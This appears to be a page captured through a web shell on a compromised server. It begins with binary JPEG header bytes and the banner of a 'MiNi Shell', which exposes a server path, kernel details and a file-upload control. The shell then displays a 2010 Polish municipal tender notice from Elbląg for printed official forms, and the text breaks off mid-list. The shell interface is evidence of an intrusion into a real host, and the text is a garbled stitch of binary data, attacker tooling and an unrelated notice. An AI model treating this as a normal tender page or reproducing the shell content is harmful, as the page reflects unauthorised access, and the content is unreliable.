JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100413/82551-N-2010.html

<p class="kh_header"><b>Elbląg: Dostawa druków dla Urzędu Miejskiego w Elblągu</b><br>
<b>Numer ogłoszenia: 82551 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa druków dla Urzędu Miejskiego w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	Dostawa druków dla Urzędu Miejskiego w Elblągu

Przedmiot główny:
Nazewnictwo wg CPV:	Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmiennicze z papieru lub tektury

Przedmioty dodatkowe:
Nazewnictwo wg CPV:	Papier ze znakiem wodnym

Nazewnictwo wg CPV:	Wizytówki

Nazewnictwo wg CPV:	Etykiety samoprzylepne

Przedmiotem zamówienia jest dostawa niżej wymienionych druków:
a)	Wzory własne:
1.	ZPO Pu-KPA 9 zadrukowane po jednej stronie - nadruk rewersu (informacje o doręczeniu), awers (dane adresata i nadawcy) niezadrukowany, papier offsetowy gramatura BD 140-200 g/m2, pionowe listwy po obu krótszych bokach formularza zawierające co najmniej 5 mm pasek kleju zabezpieczony łatwą do oddzielenia osłoną i zaopatrzone w perforację pionową umożliwiającą wyrwanie środkowej części druku bez jego uszkodzenia. Klej gwarantujący przyczepność i odporność na odklejenie w zastosowaniu do różnego rodzaju podłoża w zróżnicowanym zakresie temperatur. Klej, osłona, papier i nadruk na rewersie nietracące swych właściwości podczas poddaniu formularza ponownemu nadrukowi na awersie w drukarkach laserowych. Podany wymiar formularza zawiera obszar wydruku, nie zawiera szerokości listew, dopuszczalna tolerancja wyniarów: 2 mm. Nie dopuszcza się formularza złożonego z odrębnych sklejonych warstw papieru w obszarze wydruku stanowiących awers i rewers - 163 920 szt.
2.	wezwanie na komisję w sprawie leczenia odwykowego - 1 100 szt.
3.	karta wędkarska wg wzoru z uwzględnieniem odręcznych adnotacji i /lub korekt - 300 szt.
4.	zaświadczenie o rejestracji sprzętu pływającego do połowu ryb wg wzoru z uwzględnieniem odręcznych adnotacji i /lub korekt - 50 szt.
5.	teczka akt pojazdu na dokumentację formatu A4, tektura, wewnątrz skoroszyt, na gumkę - 14 000 szt.
6.	wniosek o rejestrację pojazdu - 10 000 szt.
7.	zawiadomienie o zbyciu pojazdu wg wzoru - 1 000 szt.
8.	podanie o wymianę dowodu rejestracyjnego z powodu braku miejsc na badanie techniczne wg wzoru - 1 000 szt.
9.	zawiadomienie o zmianie nazwiska - naniesienie zmian w dowodzie rejestracyjnym wg  wzoru - 200 szt.
10.	wniosek o wydanie zatrzymanego dowodu rejestracyjnego wg wzoru z uwzględnieniem adnotacji lub/i korekt - 1 500 szt.
11.	podanie o naniesienie zastawu rejestrowego wg wzoru - 100 szt.
12.	wniosek o wydanie nowych tablic rejestracyjnych z powodu zagubienia/zniszczenia/kradzieży wg wzoru - 500 szt.
13.	teczka akt ewidencyjnych kierowcy na dokumentację formatu A5, tektura, wewnątrz skoroszyt, na gumkę wg wzoru - 5 000 szt.
14.	wniosek dot. zmian konstrukcyjnych pojazdu wg wzoru - 100 szt.
15.	pismo w zakresie dostarczenia dokumentów oraz poprawienia wniosku - do świadczeń rodzinnych - druk samokopiujący - na stronie kopii adnotacja: Otrzymałem/am dnia... - 12 000 kompletów (oryginał + kopia)
16.	druk o wydanie zaświadczenia - 500 szt.
17.	prośba o przekazywanie świadczeń na konto bankowe - 500 szt.
18.	oświadczenie o odprowadzaniu składek na ubezpieczenie społeczne - 500 szt.
19.	oświadczenie o odprowadzaniu składek na ubezpieczenie zdrowotne - 500 szt.
20.	oświadczenie pod rygorem odpowiedzialności karnej - 3 000 szt.
21.	oświadczenie pod rygorem odpowiedzialności karnej - 1 000 szt.
22.	wniosek o podjęcie działań wobec dłużnika alimentacyjnego - 1 000 szt.
23.	pełnomocnictwo do funduszu alimentacyjnego - 500 szt.
24.	pełnomocnictwo do zasiłku pielęgnacyjnego - 300 szt.
25.	oświadczenie dotyczące dodatku pielęgnacyjnego - 400 szt.
26.	zaświadczenie o zatrudnieniu - 200 szt.
27.	wniosek o wyrejestrowanie pojazdu - 1 000 szt.
28.	wniosek o wydanie wtórnika karty pojazdu - 100 szt.
29.	wniosek o wydanie wtórnika dowodu rejestracyjnego (pozwolenia czasowego) - 100 szt.
30.	podanie o wykreślenie zastawu rejestrowego wg wzoru - 100 szt.
31.	skierowanie na dodatkowe badania techniczne - 100 szt.
32.	wizytówki na papierze sztywnym ozdobnym imienne realizowane w ciągu roku wg potrzeb Zamawiającego - 5 000 szt.
33.	koperty z herbem i nadrukiem Prezydent Miasta Elbląg w lewym górnym rogu wg wzoru, siatka na dolnym polu, obramowanie pól i krzyży w kolorze złotym - 2 600 szt.
34.	koperty z herbem i nadrukiem Wiceprezydent Miasta Elbląg w lewym górnym rogu wg wzoru - 1 500 szt.
35.	kolorowa informacja dot. zgłoszenia urodzenia dziecka z uwzględnieniem naniesionych odręcznie adnotacji i/lub korekt, wg wzoru - 3 000 szt.


b)	Wzory standardowe:
1.	ZPO zagraniczne wg wzoru CN 07 - 50 szt.
2.	dziennik budowy DB2 dla obiektów budowlanych Pb-51 wg wzoru druk jednostronny oryginał + kopia, 25 stron, okładka sztywna - 96 szt.
3.	polecenie wyjazdu służbowego wg wzoru - 500 szt.
4.	księga kontowa Pu-K-193 wg wzoru 92 str. - 65 szt.
5.	polecenie przelewu komputerowe na papierze samokopiującym 4-kartkowe K-402 S -  5 000 szt.
6.	polecenie księgowania K167 papier samokopiujący (1 oryginał + 1 kopia) - 155 bloczków po 60 kompletów kart (oryg+kopia, w sumie 120 arkuszy)
7.	polecenie księgowania K167 - 15 bloczków po 60 kart
8.	informacja w sprawie podatku od nieruchomości IN-1 + dane o nieruchomościach ZN-1/A (jako całość) - wzory druków zostaną przekazane po ich zatwierdzeniu w późniejszym terminie - 6 000 szt.
9.	deklaracje na podatek od nieruchomości DN-1 - wzory druków zostaną przekazane po ich zatwierdzeniu w późniejszym terminie - 1 500 szt.
10.	dane o nieruchomościach ZN-1/A+dane o zwolnieniach podatkowych w podatku od nieruchomości ZN-1/B (jako załącznik) - wzory druków zostaną przekazane po ich zatwierdzeniu w późniejszym terminie - 1 500 szt.
11.	karta Magazyn Wyda (W) bloczki samokopiujące ścisłego zarachowania - 50 bloczków po 100 kartek
12.	karta magazynowa sztywna Gm-130 - 800 szt.
13.	meldunek o odnalezieniu dokumentu stwierdzającego tożsamość (Pu D-10) wg wzoru -            100 szt.
14.	zgłoszenie pobytu stałego (Pu E-1) wg wzoru - 8 000 szt.
15.	zgłoszenie wymeldowania z miejsca pobytu stałego (Pu E-2) wg wzoru - 5 000 szt.
16.	zgłoszenie pobytu czasowego trwającego ponad 3 miesiące (Pu E-3) wg wzoru - 5 000 szt.
17.	zgłoszenie wymeldowania z pobytu czasowego ponad 3 miesiące (Pu E-4) wg wzoru -               2 000 szt.
18.	akt urodzenia podwójny składany M-1, wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 2000 szt.
19.	akt małżeństwa podwójny składany M-2 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 400 szt.
20.	akt zgonu podwójny składany M-3 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 1 500 szt.
21.	odpis zupełny aktu małżeństwa M-5 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 800 szt.
22.	odpis zupełny aktu urodzenia M-4 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 7 000 szt.
23.	odpis zupełny aktu zgonu M-6 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 200 szt.
24.	odpis skrócony aktu urodzenia znak wodny M-8 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 29 000 szt.
25.	odpis skrócony aktu małżeństwa M-13 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 13 000 szt.
26.	odpis skrócony aktu zgonu M-15 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 8 000 szt.
27.	zaświadczenie o braku okoliczności wyłączających zawarcie małżeństwa M-201 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 4 000 szt.
28.	zaświadczenie o zdolności prawnej do zawarcia małżeństwa M-200 znak wodny wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 200 szt.
29.	zapewnienie M-17 składane wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 1 000 szt.
30.	zawiadomienie do USC w celu naniesienia przypisku pod aktem stanu cywilnego M-52 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 3 000 szt.
31.	wniosek o nadanie medalu za długoletnie pożycie małżeńskie M-100 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 200 szt.
32.	wielojęzyczny odpis skrócony aktu urodzenia M-210 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 1 000 szt.
33.	wielojęzyczny odpis skrócony aktu małżeństwa M211 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 200 szt.
34.	wielojęzyczny odpis skrócony aktu zgonu M-212 wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 100 szt.
35.	odpis skrócony aktu urodzenia M-8a ewidencja wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 1 000 szt.
36.	odpis skrócony aktu małżeństwa M-13a ewidencja wg wzoru, druki spójne z obowiązującym komputerowym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno - Handlowe Technika, ul. Toszecka 2 w Gliwicach - 2 000 szt.
37.	spis spraw Pu Kn-4 wg wzoru - 33 960 szt.
38.	wezwanie do złożenia wyjaśnień/zeznań/udziału wg wzoru z uwzględnieniem korekty - 300 szt.
39.	wniosek o ustalenie prawa do zasiłku rodzinnego oraz dodatków do zasiłku rodzinnego - wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 20 000 szt.
40.	wniosek o ustalenie prawa do zasiłku pielęgnacyjnego- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 3 000 szt.
41.	wniosek o ustalenie prawa do świadczenia pielęgnacyjnego - wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 500 szt.
42.	wniosek o ustalenie prawa do świadczeń z funduszu alimentacyjnego - wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 1 000 szt.
43.	oświadczenie członków rodziny rozliczających się na podstawie przepisów o zryczałtowanym podatku dochodowym od niektórych przychodów osiąganych przez osoby fizyczne o wysokości dochodu uzyskanego w roku kalendarzowym poprzedzającym okres zasiłkowy- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 25 000 szt.
44.	oświadczenie o dochodzie członków rodziny rozliczających się na podstawie przepisów o zryczałtowanym podatku dochodowym od niektórych przychodów osiąganych przez osoby fizyczne, uzyskanym w roku kalendarzowym poprzedzającym okres świadczeniowy- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 2 500 szt.
45.	oświadczenie o dochodzie członków rodziny niepodlegającym opodatkowaniu, uzyskanym w roku kalendarzowym poprzedzającym okres świadczeniowy - wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 2 500 szt.
46.	oświadczenie członka rodziny o wysokości dochodu niepodlegającego opodatkowaniu, który został uzyskany w roku kalendarzowym poprzedzającym okres zasiłkowy- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 25 000 szt.
47.	kwestionariusz wywiadu alimentacyjnego- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 500 szt.
48.	oświadczenie majątkowe dłużnika alimentacyjnego- wzory druków zostaną przekazane po określeniu ich aktami wykonawczymi w późniejszym terminie - 500 szt.
49.	wniosek o wpis do ewidencji działalności gospodarczej EDG-1 str. 1 - 3 000 szt.
50.	wniosek o wpis do ewidencji działalności gospodarczej EDG-1 str. 2 - 3 000 szt.
51.	dodatkowe miejsca wykonywania działalności gospodarczej - część EDG-MW nr - 500 szt.
52.	informacja o rachunkach bankowych - część EDG-RB nr - 100 szt.
53.	wykonywana działalność gospodarcza - część EDG-RD nr - 500 szt.
54.	EDG POPR - 2 000 szt.
55.	wniosek o wydanie dowodu osobistego D-1 - 3 000 szt.
56.	zawiadomienie o zameldowaniu na pobyt stały (wezwanie o przesłanie karty osobowej) (Pu E-17) wg wzoru - 200 szt.
57.	koperty dowodowe Pu-D-7 na dokumentację formatu   A5 wg wzoru - 2 000 szt.
58.	dziennik korespondencyjny Wkt 101, 96 str. - 10 szt.
59.	dziennik ewidencji wykonanych dokumentów Wkt 102, 96 str. - 10 szt.
60.	noty księgowe - 50 bloczków po 60 kart
61.	księga druków ścisłego zarachowania - 20 szt.
62.	wniosek o skreślenie z listy członków PKZP - 5 bloczków po 60kart
63.	druki KW na papierze samokopiującym (1oryginał + 1 kopia) - 10 bloczków po 60 kompletów kart (oryg+kopia, w sumie 120 arkuszy)
64.	karta udostępniania akt Pu-A-32 na 20... r. - 60 bloczków po 60 kart
65.	etykiety termiczne, samoprzylepne do drukarki Zebra GK420d. Wymiary etykiet: 50 mm x 30 mm, kolor biały, 1000 szt. etykiet na jednej rolce. Średnica wewnętrzna rolki min. 25 mm, średnica zewnętrzna rolki max 100 mm - 350 rolek

Zamawiający informuje, że ZAŁĄCZNIK NR 4 do SIWZ - Wzory własne oraz ZAŁĄCZNIK NR 5 do SIWZ - Wzory standardowe zawiera ilość zamawianych druków z podziałem na etapy dostawy, miejsca dostawy oraz wymagane formaty zamawianych druków.

Faktury za druki dostarczone do Wydziału Świadczeń Rodzinnych zostaną przesłane na adres: Wydział Świadczeń Rodzinnych, UM Elbląg, ul. Jaśminowa 11, 82 - 300 Elbląg a faktury za resztę dostaw na adres: Wydział Administracyjno - Gospodarczy, UM Elbląg, ul. Łączności 1, 82 - 300 Elbląg.

Kserokopie wzorów druków - Wzory własne przekazane są wraz ze Specyfikacją Istotnych Warunków Zamówienia jako ZAŁĄCZNIK NR 6 do SIWZ.
Kserokopie wzorów druków - Wzory standardowe przekazane są wraz ze Specyfikacją Istotnych Warunków Zamówienia jako ZAŁĄCZNIK NR 7 do SIWZ.
Oryginały wszystkich wzorów zamawianych druków znajdują się do wglądu w siedzibie Zamawiającego, tj. w Urzędzie Miejskim w Elblągu, Wydział Zamówień Publicznych, pok. 125.
	
2.	Zakres zamówienia obejmuje dostawę druków dla Wydziałów Urzędu Miejskiego w Elblągu wg wskazanych miejsc dostaw, po uprzednim zaawizowaniu dostaw cząstkowych i ustaleniu ich konkretnego terminu z Zamawiającym w Wydz. Administracyjno - Gospodarczym, pok. 200, nr. tel. 55 239 32 00.

3.	Zamawiający wymaga aby druki były zgodne z wzorami Zamawiającego, a ich jakość musi odpowiadać jakości posiadanych przez Zamawiającego wzorów.

4.	Zakres zamówienia obejmuje dostawę druków z podziałem na 4 etapy dostawy:
I etap	 	- w terminie 3 tygodni od daty udzielenia zamówienia
II etap 		- do dnia 30 maja 2010r.  
III etap 		- do dnia 30 września 2010r.  

IV etap 		- do dnia 31 grudnia 2010r.  
Zamawiający może, w sytuacjach uzasadnionych, wymagać wcześniejszych, niż wskazane dostaw z realizacją w ciągu 7 dni od powiadomienia Wykonawcy faksem, e - mailem lub telefonicznie.

5.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

6.	Zamawiający informuje, że nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.

7.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:

 Zamawiający nie przewiduje zmian postanowień zawartej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.42.00.00-0, 30.19.97.30-6, 30.19.28.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich trzech lat przed upływem terminu składania ofert co najmniej 2 dostaw druków o wartości minimum 40 000,00 zł (brutto) każda.

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku, tj. liczba dostaw, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

Natomiast sumowaniu nie podlega wartość dostaw, tj. każda wykazana dostawa musi mieć wartość minimum 40 000,00 zł (brutto).

Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia wykonywania dostawy, podając datę i kurs.

Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
